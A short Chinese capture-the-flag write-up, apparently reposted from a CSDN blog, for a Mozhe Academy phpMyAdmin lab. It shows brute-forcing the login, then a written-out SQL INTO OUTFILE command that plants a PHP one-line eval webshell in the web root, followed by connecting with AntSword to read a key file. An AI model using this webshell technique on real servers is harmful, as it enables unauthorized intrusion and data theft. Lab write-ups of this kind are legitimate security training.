墨者学院——phpMyAdmin后台文件包含分析溯源

此题利用一句话木马

进入登陆界面,用burpsuite爆破得到username与password都为:root
在这里插入图片描述

进入SQL界面,输入一句话木马(密码为leo),点击“执行”:

select "<?php eval($_post[leo]);?>" into outfile "/var/www/html/3.php"

(/var/www/html/ 是网站的根目录)
在这里插入图片描述

在这里插入图片描述

此时打开蚁剑(注意:url后面记得跟上一句话木马目标的页面3.php):
在这里插入图片描述

在根目录找到key.txt:
在这里插入图片描述

在这里插入图片描述

发布了71 篇原创文章 · 获赞 3 · 访问量 4044

猜你喜欢

转载自blog.csdn.net/zouchengzhi1021/article/details/104241799